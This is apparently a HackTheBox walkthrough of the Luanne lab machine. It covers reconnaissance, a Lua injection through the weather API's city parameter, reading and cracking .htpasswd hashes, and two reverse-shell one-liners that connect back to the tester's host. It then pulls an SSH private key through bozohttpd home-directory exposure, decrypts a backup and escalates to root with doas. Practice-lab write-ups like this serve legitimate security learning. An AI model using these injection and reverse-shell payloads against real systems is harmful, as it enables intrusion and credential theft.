Welcome back to another of my HackTheBox walkthroughs! As per usual no nonsense here, I am going to jump right in and let us discover the delights of the Luanne machine together!

The nmap session:

Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-19 11:51 CET
Nmap scan report for 10.10.10.218
Host is up (0.047s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.0 (NetBSD 20190418-hpn13v14-lpk; protocol 2.0)
| ssh-hostkey: 
|   3072 20:97:7f:6c:4a:6e:5d:20:cf:fd:a3:aa:a9:0d:37:db (RSA)
|   521 35:c3:29:e1:87:70:6d:73:74:b2:a9:a2:04:a9:66:69 (ECDSA)
|_  256 b3:bd:31:6d:cc:22:6b:18:ed:27:66:b4:a7:2a:e4:a5 (ED25519)
80/tcp   open  http    nginx 1.19.0
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=.
| http-robots.txt: 1 disallowed entry 
|_/weather
|_http-server-header: nginx/1.19.0
|_http-title: 401 Unauthorized
9001/tcp open  http    Medusa httpd 1.12 (Supervisor process manager)
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=default
|_http-server-header: Medusa/1.12
|_http-title: Error response
Service Info: OS: NetBSD; CPE: cpe:/o:netbsd:netbsd

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 214.34 seconds


Three different opened ports: 22 (ssh), 80 and 9001 (HTTP).

Take a look at the web sites on the two ports.

Both the portals are protected by authentication and at the moment we do not know their credentials. However, it seems that an nginx server is also available on port 80. On the same portal it's possible to find the (http://10.10.10.218/)robots.txt file.

User-agent: *
Disallow: /weather  #returning 404 but still harvesting cities 


It seems that there's a /weather route, but it returns 404. I try to launch a dirb session in order to find hidden folders, but nothing comes out. Coming back on the the service on the port 9001 (in the nmap output scan), it's possible read "Medusa httpd 1.12 (Supervisor process manager)", so, searching for different sentences based on "Medusa httpd 1.12" and "Supervisor process manager", I found some interesting links:

Well, the second one is in Japanese, but google translator can help you! :)

I need something like a page that execute some backend functions, so come back on dirb again and try with the routing found on the robots.txt file, for hidden folders on that specific path.

┌─[in7rud3r@kali-muletto]─[~/Dropbox/hackthebox/_10.10.10.218 - Luanne (unk)/attack]  
└──╼ $dirb http://luanne.htb/weather/ /usr/share/dirb/wordlists/big.txt 

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Dec 20 11:39:32 2020
URL_BASE: http://luanne.htb/weather/
WORDLIST_FILES: /usr/share/dirb/wordlists/big.txt

-----------------

GENERATED WORDS: 20458                                                         

---- Scanning URL: http://luanne.htb/weather/ ----
+ http://luanne.htb/weather/forecast (CODE:200|SIZE:90)                                                                                                                                                 
                                                                                                                                                                                                        
-----------------
END_TIME: Sun Dec 20 11:56:20 2020
DOWNLOADED: 20458 - FOUND: 1


Good.

Well, working on this I found something.

http://luanne.htb/weather/forecast?city=list
{"code": 200,"cities": ["London","Manchester","Birmingham","Leeds","Glasgow","Southampton","Liverpool","Newcastle","Nottingham","Sheffield","Bristol","Belfast","Leicester"]}

http://luanne.htb/weather/forecast?city=Manchester
{"code": 200,"city": "Manchester","list": [{"date": "2020-12-20","weather": {"description": "snowy","temperature": {"min": "12","max": "46"},"pressure": "1799","humidity": "92","wind": {"speed": "2.1975513692014","degree": "102.76822959445"}}},{"date": "2020-12-21","weather": {"description": "partially cloudy","temperature": {"min": "15","max": "43"},"pressure": "1365","humidity": "51","wind": {"speed": "4.9522297247313","degree": "262.63571172766"}}},{"date": "2020-12-22","weather": {"description": "sunny","temperature": {"min": "19","max": "30"},"pressure": "1243","humidity": "13","wind": {"speed": "1.8041767538525","degree": "48.400944394059"}}},{"date": "2020-12-23","weather": {"description": "sunny","temperature": {"min": "30","max": "34"},"pressure": "1513","humidity": "84","wind": {"speed": "2.6126398323104","degree": "191.63755226741"}}},{"date": "2020-12-24","weather": {"description": "partially cloudy","temperature": {"min": "30","max": "36"},"pressure": "1772","humidity": "53","wind": {"speed": "2.7699138359167","degree": "104.89152945159"}}}]}

http://luanne.htb/weather/forecast?city='
<br>Lua error: /usr/local/webapi/weather.lua:49: attempt to call a nil value

http://luanne.htb/weather/forecast?city=' or '' = '
<br>Lua error: /usr/local/webapi/weather.lua:49: attempt to call a nil value


Now I know that the lua language is used to write the backend server behind the portal. It seems to be not vulnerable to the sql injection, but probably I'm mistaking with the technology. Searching for "lua sql injection":

Syhunt | Lua Web Application Security Vulnerabilities

Well, it's clear that you can execute some shell commands closing the original query (use the ' char) and using the os.execute with the command inside as string, let me try, listing the current folder (ls -la).

http://luanne.htb/weather/forecast?city=Leeds%27)%20os.execute(%27ls%20-la%27)%20--

{"code": 500,"error": "unknown city: Leedstotal 20
drwxr-xr-x   2 root  wheel  512 Nov 25 11:27 .
drwxr-xr-x  24 root  wheel  512 Nov 24 09:55 ..
-rw-r--r--   1 root  wheel   47 Sep 16 15:07 .htpasswd
-rw-r--r--   1 root  wheel  386 Sep 17 20:56 index.html
-rw-r--r--   1 root  wheel   78 Nov 25 11:38 robots.txt


It works, try to read the .htpasswd file.

http://luanne.htb/weather/forecast?city=Leeds%27)%20os.execute(%27cat%20.htpasswd%27)%20--

{"code": 500,"error": "unknown city: Leedswebapi_user:$1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0


Nice, it seems to be a classical encrypted unix password, should be really simple to crack it using hashcat.

┌─[✗]─[in7rud3r@Mykali]─[~/Dropbox/hackthebox/_10.10.10.218 - Luanne (unk)/attack/hcat]  
└──╼ $hashcat -a 0 -m 500 pwd.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...

OpenCL API (OpenCL 1.2 pocl 1.5, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i5-7300HQ CPU @ 2.50GHz, 2889/2953 MB (1024 MB allocatable), 2MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 64 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0:iamthebest    
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Name........: md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)
Hash.Target......: $1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0
Time.Started.....: Wed Dec 30 21:03:00 2020 (3 secs)
Time.Estimated...: Wed Dec 30 21:03:03 2020 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:     1581 H/s (4.98ms) @ Accel:128 Loops:125 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 3072/14344385 (0.02%)
Rejected.........: 0/3072 (0.00%)
Restore.Point....: 2816/14344385 (0.02%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:875-1000
Candidates.#1....: pirate -> dangerous

Started: Wed Dec 30 21:02:54 2020
Stopped: Wed Dec 30 21:03:04 2020


I try to use the discovered password on the ssh port, but it doesn't work, so I come back on the portal and I have a nice surprise (modify your /etc/hosts file with the luanne.htb domain that point to the 10.10.10.218 address).

http://luanne.htb/
user: webapi_user
password: iamthebest

But nothing news. Well, anyway, I can execute some shell command using the exploit found on the page. So, I try a different set of shells, until I found the right one (first one doesn't work, but the second one, it's ok).

http://luanne.htb/weather/forecast?city=Leeds%27)%20os.execute(%27nc%2010.10.14.133%204444%20-e%20/bin/bash%27)%20--

┌─[in7rud3r@Mykali]─[~/Dropbox/hackthebox/_10.10.10.218 - Luanne (unk)/attack/hcat]  
└──╼ $nc -lvp 4444
listening on [any] 4444 ...
connect to [10.10.14.133] from luanne.htb [10.10.10.218] 65200
id
ls -la
^C


http://luanne.htb/weather/forecast?city=Leeds%27)%20os.execute(%27rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fsh%20-i%202%3E%261%7Cnc%2010.10.14.133%204444%20%3E%2Ftmp%2Ff%27)%20--

┌─[✗]─[in7rud3r@Mykali]─[~/Dropbox/hackthebox/_10.10.10.218 - Luanne (unk)/attack/hcat]  
└──╼ $nc -lvp 4444
listening on [any] 4444 ...
connect to [10.10.14.133] from luanne.htb [10.10.10.218] 65172
sh: can't access tty; job control turned off
$


Well, if you follow me and you have read my past writeups, you should know how to create a fast web server on your machine to allow to download files from the remote machine (php -S <your IP address>:<port to use>). Download the linpeas.sh script and check for possible vulnerabilities.

[+] Finding possible password variables inside /home /var/www /var/backups /tmp /etc /root /mnt (limit 70)
sed: 1: "s,Dgpg.passphrase|Dsona ...": unterminated substitute pattern
[...]
[+] Finding 'username' string inside /home /var/www /var/backups /tmp /etc /root /mnt (limit 70)
/etc/supervisord.conf:username = user
[...]
[+] Looking for specific hashes inside files - less false positives (limit 70)
/var/www/.htpasswd:$1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0
[...]


Not so much thing that I already know, I try with the file supervisord.conf.

$ cat /etc/supervisord.conf
[unix_http_server]
file=/var/supervisord/run/supervisord.sock      ; path to your socket file

[inet_http_server]
port = 0.0.0.0:9001
username = user
password = 123

[environment]
TERM=tmux

[supervisord]
logfile=/dev/null                               ; supervisord log file
pidfile=/var/supervisord/run/supervisord.pid    ; pidfile location
minfds=1024                                     ; number of startup file descriptors
minprocs=200                                    ; number of process descriptors
user=_httpd                                     ; default user
[...]


Oh oh, come back on the web on the port 9001.

After launch all the services it is possible to consult some logs and the list of process executed on the server (I should take the same output with the ps command on the shell I obtained). There's an interesting line, quite unique on the processes' list.

r.michaels   185  0.0  0.0  34996  2000 ?     Is   Sat06PM 0:00.02 /usr/libexec/httpd -u -X -s -i 127.0.0.1 -I 3001 -L weather /home/r.michaels/devel/webapi/weather.lua -P /var/run/httpd_devel.pid -U r.michaels -b /home/r.michaels/devel/www


Something is running on the port 3001, but probably is available only locally.

$ curl http://localhost:3001/
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   199  100   199    0     0  66333      0 --:--:-- --:--:-- --:--:-- 66333
<html><head><title>401 Unauthorized</title></head>
<body><h1>401 Unauthorized</h1>
/: <pre>No authorization</pre>
<hr><address><a href="//localhost:3001/">localhost:3001</a></address>
</body></html>


Needs authentication, let me try with some of them found before.

$ curl -u webapi_user:iamthebest http://localhost:3001/
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   386  100   386    0     0  96500      0 --:--:-- --:--:-- --:--:-- 96500
<!doctype html>
<html>
  <head>
    <title>Index</title>
  </head>
  <body>
    <p><h3>Weather Forecast API</h3></p>
    <p><h4>List available cities:</h4></p>
    <a href="/weather/forecast?city=list">/weather/forecast?city=list</a>
    <p><h4>Five day forecast (London)</h4></p>
    <a href="/weather/forecast?city=London">/weather/forecast?city=London</a>
    <hr>
  </body>
</html>


I tried with a set of traversal path vulnerability, but, it doesn't work.

$ curl -u webapi_user:iamthebest http://localhost:3001/../user.txt
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   212  100   212    0     0  70666      0 --:--:-- --:--:-- --:--:-- 70666
<html><head><title>404 Not Found</title></head>
<body><h1>404 Not Found</h1>
user.txt: <pre>This item has not been found</pre>
<hr><address><a href="//localhost:3001/">localhost:3001</a></address>
</body></html>
$ curl -u webapi_user:iamthebest http://localhost:3001/../../user.txt
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   212  100   212    0     0  70666      0 --:--:-- --:--:-- --:--:-- 70666
<html><head><title>404 Not Found</title></head>
<body><h1>404 Not Found</h1>
user.txt: <pre>This item has not been found</pre>
<hr><address><a href="//localhost:3001/">localhost:3001</a></address>
</body></html>
$ curl -u webapi_user:iamthebest http://localhost:3001/../../../user.txt
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   212  100   212    0     0  70666      0 --:--:-- --:--:-- --:--:-- 70666
<html><head><title>404 Not Found</title></head>
<body><h1>404 Not Found</h1>
user.txt: <pre>This item has not been found</pre>
<hr><address><a href="//localhost:3001/">localhost:3001</a></address>
</body></html>
$ curl -u webapi_user:iamthebest http://localhost:3001/../../../../user.txt
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   212  100   212    0     0  70666      0 --:--:-- --:--:-- --:--:-- 70666
<html><head><title>404 Not Found</title></head>
<body><h1>404 Not Found</h1>
user.txt: <pre>This item has not been found</pre>
<hr><address><a href="//localhost:3001/">localhost:3001</a></address>
</body></html>
$ curl -u webapi_user:iamthebest http://localhost:3001/../../../../../user.txt
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   212  100   212    0     0  70666      0 --:--:-- --:--:-- --:--:-- 70666
<html><head><title>404 Not Found</title></head>
<body><h1>404 Not Found</h1>
user.txt: <pre>This item has not been found</pre>
<hr><address><a href="//localhost:3001/">localhost:3001</a></address>
</body></html>


I try to retrieve additional information on the response of the request.

$ curl -u webapi_user:iamthebest http://localhost:3001/ -v
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
  0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0*   Trying ::1:3001...
* Connection failed
* connect to ::1 port 3001 failed: Connection refused
*   Trying 127.0.0.1:3001...
* Connected to localhost (127.0.0.1) port 3001 (#0)
* Server auth using Basic with user 'webapi_user'
> GET / HTTP/1.1
> Host: localhost:3001
> Authorization: Basic d2ViYXBpX3VzZXI6aWFtdGhlYmVzdA==
> User-Agent: curl/7.71.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Sun, 03 Jan 2021 23:04:50 GMT
< Server: bozohttpd/20190228
< Accept-Ranges: bytes
< Last-Modified: Thu, 17 Sep 2020 20:56:21 GMT
< Content-Type: text/html
< Content-Length: 386
< Connection: close
< 
{ [386 bytes data]
100   386  100   386    0     0  77200      0 --:--:-- --:--:-- --:--:-- 96500
* Closing connection 0
<!doctype html>
<html>
  <head>
    <title>Index</title>
  </head>
  <body>
    <p><h3>Weather Forecast API</h3></p>
    <p><h4>List available cities:</h4></p>
    <a href="/weather/forecast?city=list">/weather/forecast?city=list</a>
    <p><h4>Five day forecast (London)</h4></p>
    <a href="/weather/forecast?city=London">/weather/forecast?city=London</a>
    <hr>
  </body>
</html>

On the response it's visible the info "Server: bozohttpd/20190228", try to search on the internet for "bozohttpd" exploit.

I read all the exploits and I focus on what seems most interesting to me.

CVE-2010-2320 : bozotic HTTP server (aka bozohttpd) before 20100621 allows remote attackers to list the contents of home directories, an
CVE-2010-2320 : bozotic HTTP server (aka bozohttpd) before 20100621 allows remote attackers to list the contents of home directories, and determine the existence of user accounts, via multiple requests for URIs beginning with /~ sequences.

To understand better the exploit search again and I found two interesting links that I report here:

#590298 - bozohttpd: CVE-2010-2320,CVE-2010-2195 multiple security issues - Debian Bug report logs
Bug #582473 “bozohttpd show index of /homt/user if there is no p...” : Bugs : bozohttpd package : Ubuntu
Binary package hint: bozohttpd Description: Ubuntu 10.04 LTSRelease: 10.04bozohttpd: Installiert: 20090522-2 Kandidat: 20090522-2 Versions-Tabelle: *** 20090522-2 0 500 http://de.archive.ubuntu.com/ubuntu/ lucid/universe Packages 100 /var/lib/dpkg/status Bozohttpd is start…

Well, let me try.

$ curl -u webapi_user:iamthebest http://localhost:3001/~r.michaels/user.txt
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   224  100   224    0     0  56000      0 --:--:-- --:--:-- --:--:-- 74666
<html><head><title>404 Not Found</title></head>
<body><h1>404 Not Found</h1>
~r.michaels/user.txt: <pre>This item has not been found</pre>
<hr><address><a href="//localhost:3001/">localhost:3001</a></address>
</body></html>


Mmmm... this is not good.

$ curl -u webapi_user:iamthebest http://localhost:3001/~r.michaels/
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   601    0   601    0     0   146k      0 --:--:-- --:--:-- --:--:--  146k
<!DOCTYPE html>
<html><head><meta charset="utf-8"/>
<style type="text/css">
table {
        border-top: 1px solid black;
        border-bottom: 1px solid black;
}
th { background: aquamarine; }
tr:nth-child(even) { background: lavender; }
</style>
<title>Index of ~r.michaels/</title></head>
<body><h1>Index of ~r.michaels/</h1>
<table cols=3>
<thead>
<tr><th>Name<th>Last modified<th align=right>Size
<tbody>
<tr><td><a href="../">Parent Directory</a><td>16-Sep-2020 18:20<td align=right>1kB
<tr><td><a href="id_rsa">id_rsa</a><td>16-Sep-2020 16:52<td align=right>3kB
</table>
</body></html>


But this can be more interesting.

$ curl -u webapi_user:iamthebest http://localhost:3001/~r.michaels/id_rsa
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  2610  100  2610    0     0   424k      0 --:--:-- --:--:-- --:--:--  424k
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEAvXxJBbm4VKcT2HABKV2Kzh9GcatzEJRyvv4AAalt349ncfDkMfFB
[...]
9OGmTT9AggBQJhLiXlkoSMReS36EYkxEncYdWM7zmC2kkxPTSVWz94I87YvApj0vepuB7b
45bBkP5xOhrjMAAAAVci5taWNoYWVsc0BsdWFubmUuaHRiAQIDBAUG
-----END OPENSSH PRIVATE KEY-----


Ok, create an id_rsa file on your local machine and try to connect through the ssh protocol.

┌─[in7rud3r@Mykali]─[~/Dropbox/hackthebox/_10.10.10.218 - Luanne (unk)/attack/ssh]  
└──╼ $ssh r.michaels@10.10.10.218 -i id_rsa 
Last login: Fri Sep 18 07:06:51 2020
NetBSD 9.0 (GENERIC) #0: Fri Feb 14 00:06:28 UTC 2020

Welcome to NetBSD!

luanne$ whoami
r.michaels
luanne$ id
uid=1000(r.michaels) gid=100(users) groups=100(users)
luanne$ pwd
/home/r.michaels
luanne$ ls -la
total 52
dr-xr-x---  7 r.michaels  users   512 Sep 16 18:20 .
drwxr-xr-x  3 root        wheel   512 Sep 14 06:46 ..
-rw-r--r--  1 r.michaels  users  1772 Feb 14  2020 .cshrc
drwx------  2 r.michaels  users   512 Sep 14 17:16 .gnupg
-rw-r--r--  1 r.michaels  users   431 Feb 14  2020 .login
-rw-r--r--  1 r.michaels  users   265 Feb 14  2020 .logout
-rw-r--r--  1 r.michaels  users  1498 Feb 14  2020 .profile
-rw-r--r--  1 r.michaels  users   166 Feb 14  2020 .shrc
dr-x------  2 r.michaels  users   512 Sep 16 16:51 .ssh
dr-xr-xr-x  2 r.michaels  users   512 Nov 24 09:26 backups
dr-xr-x---  4 r.michaels  users   512 Sep 16 15:02 devel
dr-x------  2 r.michaels  users   512 Sep 16 16:52 public_html
-r--------  1 r.michaels  users    33 Sep 16 17:16 user.txt
luanne$ cat user.txt
e******************************0
luanne$

Good job, let go to proceed with the root flag. Make attention to the message "Welcome to NetBSD!". Again nothing with another session of linpeas with this user. From the forum I understand that some trips are available on the home folder of the user. Searching I found an encrypted backup file. Using my know-how on the matter, I try to decrypt the file using openssl command-line tool, but I can't, so, considering the message on the ssh connection (about the NetBSD), I try to search on the internet "decrypt enc file netbsd".

netpgp(1) - NetBSD Manual Pages

I try.

luanne$ netpgp --decrypt /home/r.michaels/backups/devel_backup-2020-09-16.tar.gz.enc --output /tmp/devel_backup-2020-09-16.tar.gz    
signature  2048/RSA (Encrypt or Sign) 3684eb1e5ded454a 2020-09-14 
Key fingerprint: 027a 3243 0691 2e46 0c29 9f46 3684 eb1e 5ded 454a 
uid              RSA 2048-bit key <r.michaels@localhost>
luanne$ ls -la
total 20
drwxrwxrwt   2 root        wheel    48 Jan  6 22:19 .
drwxr-xr-x  21 root        wheel   512 Sep 16 22:05 ..
-rw-------   1 r.michaels  wheel  1639 Jan  6 22:20 devel_backup-2020-09-16.tar.gz
luanne$ tar -zxvf devel_backup-2020-09-16.tar.gz                                                                                                
x devel-2020-09-16/
x devel-2020-09-16/www/
x devel-2020-09-16/webapi/
x devel-2020-09-16/webapi/weather.lua
x devel-2020-09-16/www/index.html
x devel-2020-09-16/www/.htpasswd
luanne$ ls -la
total 28
drwxrwxrwt   3 root        wheel    96 Jan  7 00:13 .
drwxr-xr-x  21 root        wheel   512 Sep 16 22:05 ..
drwxr-x---   4 r.michaels  wheel    96 Sep 16 15:02 devel-2020-09-16
-rw-------   1 r.michaels  wheel  1639 Jan  7 00:13 devel_backup-2020-09-16.tar.gz
luanne$ cd devel-2020-09-16/                                                                                                                                                                                   
luanne$ ls -la
total 32
drwxr-x---  4 r.michaels  wheel  96 Sep 16 15:02 .
drwxrwxrwt  3 root        wheel  96 Jan  7 00:13 ..
drwxr-xr-x  2 r.michaels  wheel  48 Sep 16 15:12 webapi
drwxr-xr-x  2 r.michaels  wheel  96 Sep 16 15:03 www
luanne$ cd www
luanne$ ls -la
total 32
drwxr-xr-x  2 r.michaels  wheel   96 Sep 16 15:03 .
drwxr-x---  4 r.michaels  wheel   96 Sep 16 15:02 ..
-rw-r--r--  1 r.michaels  wheel   47 Sep 16 18:14 .htpasswd
-rw-r--r--  1 r.michaels  wheel  378 Sep 16 15:03 index.html
luanne$ cat .htpasswd                                                                                                                                                                                          
webapi_user:$1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu.


Good, I have another encrypted password for hashcat.

┌─[in7rud3r@Mykali]─[~/Dropbox/hackthebox/_10.10.10.218 - Luanne (unk)/attack/hcat]  
└──╼ $hashcat -a 0 -m 500 pwd2.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...

OpenCL API (OpenCL 1.2 pocl 1.5, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Core(TM) i5-7300HQ CPU @ 2.50GHz, 2889/2953 MB (1024 MB allocatable), 2MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

Host memory required for this attack: 64 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu.:littlebear    
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Name........: md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)
Hash.Target......: $1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu.
Time.Started.....: Thu Jan  7 00:11:47 2021 (3 secs)
Time.Estimated...: Thu Jan  7 00:11:50 2021 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:     6657 H/s (8.98ms) @ Accel:64 Loops:500 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 12928/14344385 (0.09%)
Rejected.........: 0/12928 (0.00%)
Restore.Point....: 12800/14344385 (0.09%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:500-1000
Candidates.#1....: john cena -> ilovegirls

Started: Thu Jan  7 00:11:43 2021
Stopped: Thu Jan  7 00:11:51 2021


That's fine. Elevating the privileges with the su command:

luanne$ su
su: You are not listed in the correct secondary group (wheel) to su root.
su: Sorry: Authentication error


But I have some problem again. Searching for "netbsd alternative to sudo":

doas - sudo alternative
doas is a sudo alternative ported from openbsd install doas # pkg install doas create the doas config file # vi /usr/local/etc/doas.conf add the following code to the doas.conf file permit nopass keepenv :wheelpermit nopass keepenv root as root make sure your user is in the wheel group...

Well, let's try.

luanne$ doas --help
doas: unknown option -- -
usage: doas [-ns] [-a style] [-C config] [-u user] command [args]
luanne$ doas -u root cat /root/root.txt
Password:
7******************************6


And it's done, that's all folks... have a nice day and enjoy with your hacking activity!

The awesome image used in this article was created by Manuel Camino